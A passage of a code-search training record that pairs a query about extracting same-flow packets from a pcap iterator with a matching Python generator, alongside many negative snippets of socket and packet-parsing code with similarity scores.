dtype='<u2').astype('u4')", "def parse_packet(self, data):\n return data.decode().split('\\x00')", "def retrieveData():\n\n\t# My terribad first attempt at this based off of outflank example\n\t# I honestly have no idea what I was doing, but leaving it here just in case\n\t########\n\t# try:\n\t# \tdata = transSock.recv(4)\n\t# except:\n\t# \treturn(\"\")\n\t# if len(data) < 4:\n\t# \treturn()\n\t# slen = struct.unpack('<I', data)[0]\n\t# data = transSock.recv(slen)\n\t# while len(data) < slen:\n\t# \tdata = data + transSock.recv(slen - len(data))\n\t# return(data)\n\t########\n\n\t# Realizing that I have to unpack the buffer length first:\n\n\tframeSize = \"\"\n\twhile len(frameSize) != 4:\n\t\tframeSize = connSock.recv(4)\n\n\tdataSize = struct.unpack('<I', frameSize)[0]\n\tdata = connSock.recv(dataSize)\n\n\treturn data", "def _read(self):\n \n try:\n d = self._get_byte()\n ts = time.time()\n while d != self.HDLC_FLAG_BYTE:\n d = self._get_byte()\n ts = time.time()\n packet = [d]\n d = self._get_byte()\n if d == self.HDLC_FLAG_BYTE:\n d = self._get_byte()\n ts = time.time()\n else:\n packet.append(d)\n while d != self.HDLC_FLAG_BYTE:\n d = self._get_byte()\n packet.append(d)\n if self._debug == True:\n print \"Serial:_read: unescaped\", packet\n packet = self._unescape(packet)\n \n crc = self._crc16(0, packet[1:-3])\n packet_crc = self._decode(packet[-3:-1])\n \n if crc != packet_crc:\n print \"Warning: wrong CRC! %x != %x %s\" % (crc, packet_crc, [\"%2x\" % i for i in packet])\n if self._debug:\n if self._ts == None:\n self._ts = ts\n else:\n print \"Serial:_read: %.4f (%.4f) Recv:\" % (ts, ts - self._ts), self._format_packet(packet[1:-3])\n self._ts = ts\n return RawPacket(ts, packet[1:-3], crc == packet_crc)\n except socket.timeout:\n return None", "def recv(self, socket):\n data = \"\"\n data_length = self.struct.unpack(socket.recv(4))[0]\n while len(data) < data_length:\n data += socket.recv(data_length - len(data))\n\n return data", "def read_socket( self ):\n incoming = self.conn.recv( 4096 )\n other = \"source\" if self.sink else \"sink\"\n self.test.info( \"received payload from %s <<<%s>>>\" % ( other,\n incoming ) )\n self.received_data += incoming", "def pull(self):\n \n data = self.s.recv(1024)\n if data:\n info = pickle.loads(data) \n \n return info.get(\"topic\"), info.get(\"value\")\n pass", "def tcp_pkt_debug_info(pkt: dpkt.ip.IP) -> str:\n if isinstance(pkt, dpkt.ip.IP):\n paylod_len = pkt.len - (4 * pkt.hl) - (4 * pkt.data.off)\n return \"{}:{}-> {}:{}, seq: {}, ack:{}, flag:{}, payload len: {}, payload: {}, sum: {}\".format(\n inet_to_str(pkt.src), pkt.data.sport, inet_to_str(pkt.dst), pkt.data.dport, hex(pkt.data.seq),\n hex(pkt.data.ack), hex(pkt.data.flags), hex(paylod_len), pkt.data.data, hex(pkt.data.sum))", "def _parse_udp_packet(self, packet_bytes):\n opcode = packet_bytes[:2]\n if opcode == 5:\n reply = self.error_messages[int.from_bytes(packet_bytes[2:4], 'big')]\n print(reply)\n elif opcode == 4:\n reply = \"ACK\"\n else:\n reply = \"UNK\"\n return reply", "def unpack(self, pkt):\n if pkt[0]!='$' or pkt[-3]!='#':\n raise ValueError('bad packet')\n if (sum(ord(c) for c in pkt[1:-3]) % 256) != int(pkt[-2:],16):\n raise ValueError('bad checksum')\n pkt = pkt[1:-3]\n return pkt", "def payload(self):\n return self._payload", "def parameters(self):\n return self.pkt.payload[8:]", "def get_from_data_channel(self, sock):\n msg_rec = b\"\"\n # Continue reading from server until there's nothing left to read.\n while 1:\n buff = sock.recv(BUFF_SIZE)\n msg_rec += buff\n if len(buff) == 0:\n break\n self.logger.log(\"Received: %s\" % msg_rec)\n return msg_rec", "def receive_packet(self, packet):\n\t\treturn", "def getDataFromSocket(session):\n \n dat = \"\"\n while 1:\n message = session.recv(4096).decode()\n last=len(message)\n if message[last-1] == \"\\n\":\n dat=dat+message[:-1]\n return dat\n else:\n dat=dat+message", "def _finalize_packet(self, rudp_packet):\n return rudp_packet.to_bytes()", "def read(self):\n packet = None\n while packet is None:\n packet = self.async_read()\n return packet", "def packet(self):\n return self.server.packet(context=self.ctx)", "def packetReceived(self, packet):\n for layer in packet:\n if (layer.layer_name == 'fmtp' and\n int(layer.type) == 1):\n # Data is stored as a hexadecimal string in the XML file\n # generated by tshark\n data = binascii.unhexlify(layer.data)\n log.msg(\"FMTP message received: {}\".format(data))", "def get_payload(self):\n self._payload_to_str()\n return self._str_payload", "def recvMsg(self):\n msgBytes, _ = self.sockUDP.recvfrom(can.CANMessage.size)\n msg = can.unpack(msgBytes)\n logger.debug(\"received: %r\", msg)\n return msg", "def receive(self) -> [Packet, None]:\n packet_size_data = self._stream.read(2)\n if not packet_size_data:\n return None\n packet_size = int.from_bytes(packet_size_data, 'little')\n packet_data = self._stream.read(packet_size)\n return packet_from_bytes(packet_data)", "def recv_data(self):\n data = \"\"\n size = 0\n\n try:\n size = self.sockObj.recv(4) #Get metadata\n except:\n raise Exception(\"Error while receiving data. Probably broken pipe\")\n\n if len(size) == 0:\n raise Exception(\"No data recivied. Probably broken pipe\")\n\n size = struct.unpack('>I',size)[0]\n\n data = self.sockObj.recv(size)\n\n if len(data) != size:\n raise Exception(\"Partiala data recivied\")\n\n return self.decode(data)", "def process_udp_packet(self, packet_data, packet_source):\n # Add your logic here, after your logic is done,\n # add the packet to be sent to self.packet_buffer\n # feel free to remove this line\n print(f\"Received a packet from {packet_source}\")\n in_packet = self._parse_udp_packet(packet_data)\n out_packet = self._do_some_logic(in_packet)\n\n # This shouldn't change.\n self.packet_buffer.append(out_packet)\n\n return in_packet", "def recibir(self):\r\n lenbuf = self.__recvall(4)\r\n longitud, = struct.unpack('!I', lenbuf)\r\n return self.__recvall(longitud)", "def get_pkt(self):\n return self.pkt", "def recvPacket(self) -> Rudp.Packet:\n (packet, validity, c) = self.recv()\n if(c != self.client):\n raise Rudp.WrongClient(\"Wrong Package from \" + c)\n return packet", "def get_data(self):\n\n data = self.socket.recv(BUFFER_SIZE)\n\n if not data:\n return None\n\n if len(data) == BUFFER_SIZE:\n while True:\n try:\n data += self.socket.recv(BUFFER_SIZE)\n except:\n break\n \n return data", "def get_net_message():\n # TODO: refactor to use a list of events encoded using masgpack?\n try:\n message, address = serverSocket.recvfrom(1024)\n except:\n return None, None\n message = message.decode('utf-8')\n return message, address", "def recv(self):\n self.buf = self.sock_in.recvfrom(65565)\n p = Packet(data=self.buf)\n return p", "def receive(self):\n raw_msglen = self.recvall(4)\n if not raw_msglen:\n return None\n msglen = stc.unpack('>I', raw_msglen)[0]\n # Read the message data\n return self.recvall(msglen)", "def parameters(self):\n return self.pkt.payload[3:]", "def parameters(self):\n return self.pkt.payload[3:]", "def parameters(self):\n return self.pkt.payload[3:]", "def recieve_data(self):\r\n try:\r\n while True:\r\n try:\r\n data, self.addr = self.sock.recvfrom(1024)\r\n return data\r\n except socket.timeout:\r\n print(\"There is no packet at all!\")\r\n break\r\n except Exception:\r\n print(\"Can't recieve a package\")", "def receive(self):\n data = self.socket.recv(4096)\n return data", "def readPacket(stream):\n header = readPacketHeader(stream)\n md5 = stream.read(16)\n data = stream.read(header.length)\n p = Packet(header, data)\n if p.md5.digest() != md5:\n raise errors.NetworkError(\n 'Wrong MD5-checksum! (expected: %s, got: %s)' % (\n p.md5.hexdigest(),\n binascii.b2a_hex(md5)))\n return p", "def recv(self) -> tuple:\n (data, c) = self.socket.recvfrom(Rudp.Packet.buffer())\n # print(data)\n (packet, validity) = Rudp.Packet.unpack(data)\n if(validity):\n print(\"Valid Packet Received From: \", c)\n else:\n raise Rudp.InvalidPacket(\"Invalid Packet Received\")\n\n return (packet, validity, c)", "def _pop_received_packet(self):\n fragments = self._receive_heap.pop_min_and_all_fragments()\n if fragments is None:\n self._attempt_disabling_looping_receive()\n else:\n last_seqnum = fragments[-1].sequence_number\n self._update_next_expected_seqnum(last_seqnum)\n self._update_next_delivered_seqnum(last_seqnum)\n payload = b''.join(f.payload for f in fragments)\n self.handler.receive_message(payload)\n\n if self._next_delivered_seqnum not in self._receive_heap:\n self._attempt_disabling_looping_receive()", "def read_data(self):\r\n # Verify length of response data\r\n length = self.read_until_null()\r\n message = self.read_until_null()\r\n if int(length) == len(message):\r\n return message\r\n else:\r\n raise ProtocolException(\"Length mismatch encountered while reading the Xdebug message\")", "def handle_packet(self, packet, udp_dport):\n return self.process_packet(packet, udp_dport)", "def __tcp_recv(self):\n total_data = []\n bs = 1024\n try:\n data = self.__sock.recv(bs)\n total_data.append(data)\n while True and data:\n if not re.search(\"L: (\\d+)\",data) and not data[-4:] == '\\r\\n\\r\\n':\n data = self.__sock.recv(bs)\n total_data.append(data)\n elif not re.search(\"L: (\\d+)\",data) and data[-4:] == '\\r\\n\\r\\n':\n return total_data\n else:\n break\n \n\n while re.search(\"L: (\\d+)\",data):\n n = len(data)\n L = int(re.findall(\"L: (\\d+)\",data)[-1])\n p = data.rfind('\\r\\n\\r\\n')\n abc = data\n data = ''\n\n p1 = data.rfind(str(L))\n if p < p1:\n log(\"rn before L\")\n left = L + n - (p1 + len(str(L))) + 4\n\n else:\n left = L - (n - p -4)\n if left == L:\n log(\"It happened!\")\n break\n\n #if more bytes then last L\n #come across another command: BN etc.\n #read until another L come\n if left < 0:\n log('abc')\n d = ''\n left = 0\n while True:\n d = self.__sock.recv(bs)\n data += d\n if re.search(\"L: (\\d+)\",d):\n break\n log(\"read left bytes\")\n log('data:'+data)\n total_data.append(data)\n\n #read left bytes in last L\n while left:\n data = self.__sock.recv(left)\n n = len(data)\n left = left - n\n\n if not data:\n break\n total_data.append(data)\n\n except socket.error,e:\n #self.__sock.close()\n raise PyFetionSocketError(e)\n\n return self.__split(''.join(total_data))\n\n #return ''.join(total_data)", "def parameters(self):\n return self.pkt.payload[2:]", "def getData(self):\n return struct.unpack(\"!I\",self.data)[0]", "def getData(self):\n return struct.unpack(\"!I\",self.data)[0]", "def handle(self):\n return struct.unpack('<H', self.pkt.payload[0:2])[0]", "def handle(self):\n return struct.unpack('<H', self.pkt.payload[0:2])[0]", "def handle_udp(pkt, packets, i, start_point):\r\n src_port = int(pkt[start_point:start_point + 4], 16)\r\n start_point += 4\r\n dest_port = int(pkt[start_point:start_point + 4], 16)\r\n start_point += 4\r\n length = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n checksum_value = pkt[start_point:start_point+4]\r\n packets[i][2].append(src_port)\r\n packets[i][2].append(dest_port)\r\n packets[i][2].append(length)\r\n packets[i][2].append(checksum_value)\r\n\r\n return packets", "def getData(self):\n return struct.unpack(\"!Q\",self.data)[0]", "def getData(self):\n return struct.unpack(\"!Q\",self.data)[0]", "def pull(self):\n \n data = self.s.recv(1024)\n if data:\n info = json.loads(data.decode()) \n print(\"DATA FROM BROKER : \", info)\n \n return info.get(\"topic\"), info.get(\"value\")\n pass", "def parse(self):\n try:\n if self.bitstream:\n # Parse message header\n self.bitstream.bytepos = 0\n\n if self.bitstream.endswith(\"\\n\"):\n pass\n\n else:\n raise PacketIncomplete(\"Packet does not end with carriage return\")\n\n if self.bitstream.find('0x 50 52 56 41 54',bytealigned=True): # If 'PRVAT' text in bitstream\n self.dataformat = 'NMEA'\n else:\n self.dataformat = 'TRITECH'\n\n if self.dataformat=='NMEA' and self.id != Message.CONFIGURATION_PARAM:\n # go to first comma\n self.bitstream.bytepos = self.bitstream.find('0x2C', bytealigned = True)[0]/8 + 1\n self.payload = self.bitstream.read('bytes:6')\n #skip comma\n self.bitstream.read('bytes:1')\n self.dataunits = self.bitstream.read('bytes:1')\n\n\n elif self.dataformat=='TRITECH' and self.id != Message.CONFIGURATION_PARAM:\n self.bitstream.bytepos = 0\n self.payload = self.bitstream.read('bytes:6')\n self.dataunits = self.bitstream.read('bytes:1')\n else:\n self.bitstream.bytepos = 0\n length_string = 'bytes:'+ str(len(self.bitstream)/8)\n self.payload = self.bitstream.read(length_string)\n\n else:\n pass\n\n except ValueError as e:\n raise PacketCorrupted(\"Unexpected error\", e)", "def __recv_frame(self) -> Dict[str, Any]:\n # Grab a packet\n packets = self.sock.recvfrom(Sniffer.RECEIVE_SIZE)\n address = self.__process_address(packets[1])\n packet = packets[0]\n offset = 0\n\n # Make sure its a valid packet\n eth_header = self.__process_ethframe(packet[offset:(offset + Sniffer.ETH_HEADER_LENGTH)])\n offset = offset + eth_header['header_length']\n\n if eth_header['protocol'] != 8:\n # Not IP\n raise UnknownPacketException(\n 'Unknown frame {}'.format(eth_header['protocol'])\n )\n\n # Get the IP header\n ip_header = self.__process_ipframe(packet[offset:(offset + Sniffer.IP_HEADER_LENGTH)])\n offset = offset + ip_header['header_length']\n\n if ip_header['protocol'] != 6:\n # Not TCP\n raise UnknownPacketException(\n 'Unknown protocol {}'.format(ip_header['protocol']),\n )\n\n # Get TCP header\n tcp_header = self.__process_tcpframe(packet[offset:(offset + Sniffer.TCP_HEADER_LENGTH)])\n offset = offset + tcp_header['header_length']\n\n # Get payload length\n payload_length = ip_header['length'] - ip_header['header_length'] - tcp_header['header_length']\n\n # Get payload\n data = packet[offset:offset + payload_length]\n\n return {\n 'ip_header': ip_header,\n 'tcp_header': tcp_header,\n 'data': data,\n 'address': address,\n }", "def tcp_reassembly(packet, *, count=NotImplemented):\n if 'TCP' in packet:\n ip = packet['IP'] if 'IP' in packet else packet['IPv6']\n tcp = packet['TCP']\n data = dict(\n bufid=(\n ipaddress.ip_address(ip.src), # source IP address\n ipaddress.ip_address(ip.dst), # destination IP address\n tcp.sport, # source port\n tcp.dport, # destination port\n ),\n num=count, # original packet range number\n ack=tcp.ack, # acknowledgement\n dsn=tcp.seq, # data sequence number\n syn=bool(tcp.flags.S), # synchronise flag\n fin=bool(tcp.flags.F), # finish flag\n rst=bool(tcp.flags.R), # reset connection flag\n payload=bytearray(bytes(tcp.payload)), # raw bytearray type payload\n )\n raw_len = len(tcp.payload) # payload length, header excludes\n data['first'] = tcp.seq # this sequence number\n data['last'] = tcp.seq + raw_len # next (wanted) sequence number\n data['len'] = raw_len # payload length, header excludes\n return True, data\n return False, None", "def packetReceived(self, ident, payload):\n pass", "def payload(self) -> \"dict\":\n return self._attrs.get(\"payload\")", "def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):\n return", "def receive_data():\n\n # Receive the first message (the header),\n # which indicates the incoming data length\n data_length = int(pickle.loads(conn.recv(HEADER_SIZE)))\n \n if data_length:\n # Receive the data itself\n data = pickle.loads(conn.recv(data_length))\n\n return data", "def payload_type(udp_protocol):\n\n\t#if ip_protocol == 17 :\n\t#\tfrom pcapfile.protocols.transport.udp import UDP\n\t#\treturn (UDP, 'UDP')\n\t#elif ip_protocol == 6:\n\t#\tfrom pcapfile.protocols.transport.tcp import TCP\n\t#\treturn (TCP, 'TCP')\n\t#elif ip_protocol == 1:\n\t#\tfrom pcapfile.protocols.transport.tcp import ICMP\n\t#\treturn (ICMP, 'ICMP')\n\t#elif ip_protocol == 41:\n\t#\tfrom pcapfile.protocols.transport.tcp import IPv6\n\t#\treturn (IPv6, 'IPv6')\n\t#elif ip_protocol == 41:\n\t#\tfrom pcapfile.protocols.transport.tcp import IPv6\n\t#\treturn (IPv6, 'IPv6')\n\t#else:\n\treturn (None, 'unknown')" ]
[ "0.8326517", "0.78962934", "0.7087218", "0.6683006", "0.6564376", "0.65308803", "0.6511432", "0.65108025", "0.6451101", "0.63990587", "0.6355475", "0.63496506", "0.6315682", "0.62409586", "0.62407076", "0.6233684", "0.62289816", "0.62234855", "0.61914325", "0.61500925", "0.6145048", "0.6088183", "0.60807586", "0.60699856", "0.6049788", "0.60101044", "0.6006161", "0.59948814", "0.5990619", "0.5967195", "0.59637696", "0.59488165", "0.5932731", "0.5930253", "0.5928488", "0.5909693", "0.5902366", "0.58952624", "0.58848447", "0.5875207", "0.58664894", "0.58340013", "0.5822825", "0.58182865", "0.58147526", "0.581", "0.5804457", "0.5802376", "0.57883406", "0.5780355", "0.57744956", "0.5771437", "0.57632226", "0.5760935", "0.5757017", "0.5746463", "0.5746442", "0.57459176", "0.5721214", "0.5719966", "0.5717378", "0.57159764", "0.57053477", "0.57015705", "0.569355", "0.5691888", "0.567303", "0.5667023", "0.5653561", "0.56491184", "0.5643048", "0.5642235", "0.5638463", "0.5638463", "0.5638463", "0.5631879", "0.5619304", "0.56097114", "0.5601159", "0.5596941", "0.5587796", "0.5585685", "0.5571952", "0.5557289", "0.5550779", "0.5550779", "0.55449945", "0.55449945", "0.5541064", "0.5540483", "0.5540483", "0.55368376", "0.55365944", "0.5531013", "0.5528871", "0.55233943", "0.5515813", "0.55108577", "0.5502363", "0.54957193" ]
0.65222436
6
Extract all packets belonging to the same flow from a pcap packet iterator
def next_connection_packets(piter, linktype=1): first_ft = None for ts, raw in piter: ft = flowtuple_from_raw(raw, linktype) if not first_ft: first_ft = ft sip, dip, sport, dport, proto = ft if not (first_ft == ft or first_ft == (dip, sip, dport, sport, proto)): break yield { "src": sip, "dst": dip, "sport": sport, "dport": dport, "proto": proto, "raw": payload_from_raw(raw, linktype).encode("base64"), "direction": first_ft == ft, }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def filter(self):\n # outfile = open(self.newpcap, 'wb')\n # writer = dpkt.pcap.Writer(outfile)\n f = open(self.pcapfile, 'rb')\n packets = dpkt.pcap.Reader(f)\n\n for timestamp, buf in packets:\n eth = dpkt.ethernet.Ethernet(buf)\n if not isinstance(eth.data, dpkt.ip.IP): # 确保以太网数据包含一个IP数据包, Non IP Packet type not supported\n continue # 过滤空IP包\n ip = eth.data # 获取以太网帧(IP数据包)\n if not isinstance(ip.data, dpkt.tcp.TCP): # 在传输层中检查TCP\n continue\n tcp = ip.data # 获取tcp数据\n # print('-->TCP Data: ', repr(tcp))\n\n \"\"\" 过滤三次握手后的首包\"\"\"\n seq = self.seq_pattern.findall(repr(tcp))\n ack = self.ack_pattern.findall(repr(tcp))\n if not (seq or ack): # seq、ack必须有一个, 一真即真\n continue\n if ack:\n ack = ack[0]\n if seq:\n seq = seq[0]\n\n if not ack and seq: # 一次握手请求\n self.hash_table[seq] = {}\n self.stream_table[seq] = [buf]\n if ack and seq: # 二次、三次、交流包\n if str(int(ack) - 1) in self.hash_table.keys(): # 有一次握手记录\n number = str(int(ack) - 1)\n if 'second' not in self.hash_table[number].keys(): # 新增二次握手\n self.hash_table[number]['second'] = {'seq': seq, 'ack': ack}\n self.stream_table[number].append(buf) # 将二次握手添加到buf\n self.resp_relation[seq] = ack # 新增关系表\n\n # 存在二次握手记录, 看hash表有无第三次握手记录, 有就保存stream流\n # 基本就是traffic响应包了\n elif 'three' in self.hash_table[number].keys():\n if number not in self.stream_table.keys():\n self.stream_table[number] = []\n self.stream_table[number].append(buf)\n else:\n self.stream_table[number].append(buf)\n\n # ack-1没有对应的hash表, 可能是三次握手或traffic请求包\n elif str(int(seq) - 1) in self.hash_table.keys():\n number = str(int(seq) - 1)\n if 'second' not in self.hash_table[number]:\n pass\n elif 'three' not in self.hash_table[number]: # 三次包\n self.hash_table[number]['three'] = {'seq': seq, 'ack': ack}\n self.stream_table[number].append(buf)\n # 否则就是traffic包了\n else:\n if number not in self.stream_table.keys():\n self.stream_table[number] = []\n self.stream_table[number].append(buf)\n else:\n self.stream_table[number].append(buf)\n # traffic响应包\n elif str(int(seq) - 1) in self.resp_relation.keys():\n number = str(int(seq) - 1)\n second_ack = self.resp_relation[number]\n number = str(int(second_ack) - 1)\n if number not in self.stream_table.keys():\n self.stream_table[number] = []\n self.stream_table[number].append(buf)\n else:\n self.stream_table[number].append(buf)\n else:\n continue # seq不存在\n\n # outfile.close()\n f.close()", "def iter_packets(iterable):\n prev = None\n\n for i in sorted(iterable, key=attrgetter('seq')):\n if prev is None or prev.seq != i.seq:\n prev = i\n yield i", "def udp_iterator(pc):\n\tfor time,pkt in pc:\n\t\teth = dpkt.ethernet.Ethernet(pkt)\n\t\tif eth.type == dpkt.ethernet.ETH_TYPE_IP:\n\t\t ip = eth.data\n\t\t # if the IP protocol is UDP, process it further\n\t\t if ip.p == dpkt.ip.IP_PROTO_UDP :\n\t\t\tudp = ip.data\n\t\t\tyield( ip.src, udp.sport, ip.dst, udp.dport, udp.data )", "def parse_packets(pcap):\n # For each packet in the pcap process the contents\n flow_Info = []\n times = 0\n for timestamp, buf in pcap:\n times += 1\n tmp_flow_Info = {}\n\n # Unpack the Ethernet frame (mac src/dst, ethertype)\n eth = dpkt.ethernet.Ethernet(buf)\n # Unpack the data whthin the Ethernet frame (the IP packet)\n ip = eth.data\n\n # if protocol(ip.p) is not UDP(17) ,skip this packet\n if ip.p != 17:\n continue\n\n udp = ip.data\n # Temp_data = parse_data(eth.data.udp.data)\n # Filter CoAP by port\n if(udp.sport != 5683 or udp.dport != 5683):\n continue\n\n str_udp_data = parse_data(eth.data.udp.data)\n # skip packets of Non_confirmable\n if str_udp_data[0] == '5': \n continue\n\n cycle = 0\n index = 0\n Udp_data = []\n \n len_str_udp_data = len(str_udp_data)\n while cycle < (len_str_udp_data//3+1):\n # Udp_data.append(int('0x'+Str_Udp_data[index:index + 2], 16))\n Udp_data.append(int('0x' + str_udp_data[index:index + 2], 16))\n cycle += 1\n index += 3\n tmp_flow_Info['udp_data'] = (Udp_data)\n\n # confirmable or ack\n tmp_flow_Info['Coap_type'] = str_udp_data[0]\n #print(str_udp_data) \n \n # skip space and get \"Message ID\" \n HexMide = str_udp_data[6:8] + str_udp_data[9:11]\n tmp_flow_Info['Mid'] = int('0x'+HexMide, 16)\n\n tmp_flow_Info['Timestamp'] = str(datetime.datetime.fromtimestamp(timestamp))\n # print('Ethernet Frame: ', mac_addr(eth.src), mac_addr(eth.dst), eth.type)\n tmp_flow_Info['src'] = inet_to_str(ip.src)\n tmp_flow_Info['dst'] = inet_to_str(ip.dst)\n\n tmp_flow_Info['sport'] = udp.sport\n tmp_flow_Info['dport'] = udp.dport\n flow_Info.append(tmp_flow_Info)\n\n return flow_Info", "def packets_for_stream(fobj, offset):\n pcap = dpkt.pcap.Reader(fobj)\n pcapiter = iter(pcap)\n ts, raw = pcapiter.next()\n\n fobj.seek(offset)\n for p in next_connection_packets(pcapiter, linktype=pcap.datalink()):\n yield p", "def print_packets(pcap):\n\n # For each packet in the pcap process the contents\n for timestamp, buf, hdr_len in pcap:\n \n # Unpack the Ethernet frame (mac src/dst, ethertype)\n eth = dpkt.ethernet.Ethernet(buf)\n # print('Ethernet Frame: ', mac_addr(eth.src), mac_addr(eth.dst), eth.type)\n\n # Make sure the Ethernet data contains an IP packet\n if not isinstance(eth.data, dpkt.ip.IP):\n # print('Non IP Packet type not supported %s\\n' % eth.data.__class__.__name__)\n continue\n\n # Now unpack the data within the Ethernet frame (the IP packet)\n # Pulling out src, dst, length, fragment info, TTL, and Protocol\n ip = eth.data\n\n # Pull out fragment information (flags and offset all packed into off field, so use bitmasks)\n # do_not_fragment = bool(ip.off & dpkt.ip.IP_DF)\n # more_fragments = bool(ip.off & dpkt.ip.IP_MF)\n # fragment_offset = ip.off & dpkt.ip.IP_OFFMASK\n\n # Print out the info\n # print('IP: %s -> %s (len=%d ttl=%d DF=%d MF=%d offset=%d)\\n' % \\\n # (inet_to_str(ip.src), inet_to_str(ip.dst), ip.len, ip.ttl, do_not_fragment, more_fragments, fragment_offset)) \n\n pkt = Packet(timestamp, buf, hdr_len)\n\n if ip.p == dpkt.ip.IP_PROTO_TCP or ip.p == dpkt.ip.IP_PROTO_UDP: \n # all flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in all_flows:\n all_flows[flow] = [pkt]\n else:\n x = len(all_flows[flow]) - 1\n if x < 0:\n all_flows[flow].append(pkt)\n else:\n if time_diff(all_flows[flow][x].timestamp, timestamp) <= 5400: #90mins\n all_flows[flow].append(pkt)\n\n if ip.p == dpkt.ip.IP_PROTO_TCP: \n # TCP flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in tcp_flows:\n tcp_flows[flow] = [pkt]\n else:\n x = len(tcp_flows[flow]) - 1\n if x < 0:\n tcp_flows[flow].append(pkt)\n else:\n if time_diff(tcp_flows[flow][x].timestamp, timestamp) <= 5400:\n tcp_flows[flow].append(pkt)\n all_host_pairs(pkt, ip)\n elif ip.p == dpkt.ip.IP_PROTO_UDP:\n # UDP flow\n flow = Flow(ip.src, ip.dst, ip.data.sport, ip.data.dport, ip.p)\n if flow not in udp_flows:\n udp_flows[flow] = [pkt]\n else:\n x = len(udp_flows[flow]) - 1\n if x < 0:\n udp_flows[flow].append(pkt)\n else:\n if time_diff(udp_flows[flow][x].timestamp, timestamp) <= 5400:\n udp_flows[flow].append(pkt)\n else:\n continue\n\n print(\"Number of All flows: %d | Number of TCP flows: %d | Number of UDP flows: %d\" % (len(all_flows), len(tcp_flows), len(udp_flows)))\n\n # -- Flow Duration\n for f in all_flows:\n size = len(all_flows[f])\n if size >= 2:\n all_flow_dur.append(time_diff(all_flows[f][0].timestamp, all_flows[f][size-1].timestamp))\n \n for f in tcp_flows:\n size = len(tcp_flows[f])\n if size >= 2:\n tcp_flow_dur.append(time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp))\n \n for f in udp_flows:\n size = len(udp_flows[f])\n if size >= 2:\n udp_flow_dur.append(time_diff(udp_flows[f][0].timestamp, udp_flows[f][size-1].timestamp))\n\n print \"lens: \", len(all_flow_dur), len(tcp_flow_dur), len(udp_flow_dur)\n\n # -- Flow Size\n for f in all_flows:\n f_bytes = 0\n size = len(all_flows[f])\n all_flow_size_pkt.append(size)\n for p in all_flows[f]:\n f_bytes += p.length\n all_flow_size_byte.append(f_bytes)\n \n for f in tcp_flows:\n f_bytes = 0\n f_overhead = 0\n size = len(tcp_flows[f])\n tcp_flow_size_pkt.append(size)\n for p in tcp_flows[f]:\n f_bytes += p.length\n f_overhead += 18 + 20 #+ tcp_hdr\n tcp_flow_size_byte.append(f_bytes)\n if f_bytes == 0:\n f_bytes = 9999\n tcp_flow_size_overhead.append(f_overhead/float(f_bytes))\n \n for f in udp_flows:\n f_bytes = 0\n size = len(udp_flows[f])\n udp_flow_size_pkt.append(size)\n for p in udp_flows[f]:\n f_bytes += p.length\n udp_flow_size_byte.append(f_bytes)\n\n # -- Inter-packet Arrival time\n for f in all_flows:\n for i in range(len(all_flows[f])-1):\n all_flow_time.append(time_diff(all_flows[f][i].timestamp, all_flows[f][i+1].timestamp))\n\n for f in tcp_flows:\n for i in range(len(tcp_flows[f])-1):\n tcp_flow_time.append(time_diff(tcp_flows[f][i].timestamp, tcp_flows[f][i+1].timestamp))\n\n for f in udp_flows:\n for i in range(len(udp_flows[f])-1):\n udp_flow_time.append(time_diff(udp_flows[f][i].timestamp, udp_flows[f][i+1].timestamp))\n\n # -- TCP State\n for f in tcp_flows:\n size = len(tcp_flows[f])\n last_pkt = tcp_flows[f][size-1]\n tcp = dpkt.ethernet.Ethernet(last_pkt.buf).data.data\n \n if (tcp.flags & dpkt.tcp.TH_SYN) != 0:\n f.state = 'Request'\n elif (tcp.flags & dpkt.tcp.TH_RST) != 0:\n f.state = 'Reset'\n elif (tcp.flags & dpkt.tcp.TH_FIN) != 0 and (tcp.flags & dpkt.tcp.TH_ACK) != 0:\n f.state = 'Finished'\n elif time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp) <= 300:\n f.state = 'Ongoing'\n elif time_diff(tcp_flows[f][0].timestamp, tcp_flows[f][size-1].timestamp) > 300 \\\n and (tcp.flags & dpkt.tcp.TH_RST) == 0 and (tcp.flags & dpkt.tcp.TH_FIN) == 0:\n f.state = 'Failed'\n\n show_cdf_graphs()", "def process_pkts(self, pkts: list):\n pkt_count = 0\n for ts, buf in pkts:\n eth = dpkt.ethernet.Ethernet(buf)\n if not isinstance(eth.data, dpkt.ip.IP):\n continue\n ip = eth.data\n if ((inet_to_str(ip.src) == self.sip and inet_to_str(ip.dst) == self.dip) or\n (inet_to_str(ip.src) == self.dip and inet_to_str(ip.dst) == self.sip)):\n if isinstance(ip.data, dpkt.tcp.TCP):\n tcp = ip.data\n if ((tcp.sport == self.sp and tcp.dport == self.dp) or\n (tcp.dport == self.sp and tcp.sport == self.dp)):\n pkt_count += 1\n self._process(buf, ts, pkt_count)\n if self._c_state == self._s_state and self._c_state == TCPState.CLOSED:\n logger.info(\"Session finished.\")\n logger.info(\"Number of packets in the session id: {} is {}\".format(\n self.session_count, len(self.sessions[self.session_count])))\n self.__reset_state__()", "def read_pkt_seq(self):\n pkt = self.read_pkt_line()\n while pkt:\n yield pkt\n pkt = self.read_pkt_line()", "def accumulate_packets():\n l = []\n packets = sniff(count=NUMBER_OF_SNIFFING_ROUNDS, lfilter=fltr, prn=printing)\n print(\"Processing packets!\")\n for packet in packets:\n l.append({\"ip\": get_ip(packet),\n \"country\": get_country(packet),\n \"entering\": is_entering(packet),\n \"port\": get_partner_port(packet),\n \"size\": packet[IP].len, #the len of the ip layer is the len of the entire packet\n \"program\": get_program(packet)})\n return l", "def __iter__(self) -> Iterator[packets.Packet]:\n for packet in self._packets:\n yield packet\n for pointer in self._packet_pointers:\n yield pointer.get()", "def pull(self):\n\n # For each packet in the pcap process the contents\n for item in self.input_stream:\n\n # Print out the timestamp in UTC\n print('%s -' % item['timestamp'], end='')\n\n # Transport info\n if item['transport']:\n print(item['transport']['type'], end='')\n\n # Print out the Packet info\n packet_type = item['packet']['type']\n print(packet_type, end='')\n packet = item['packet']\n if packet_type in ['IP', 'IP6']:\n # Is there domain info?\n if 'src_domain' in packet:\n print('%s(%s) --> %s(%s)' % (net_utils.inet_to_str(packet['src']), packet['src_domain'],\n net_utils.inet_to_str(packet['dst']), 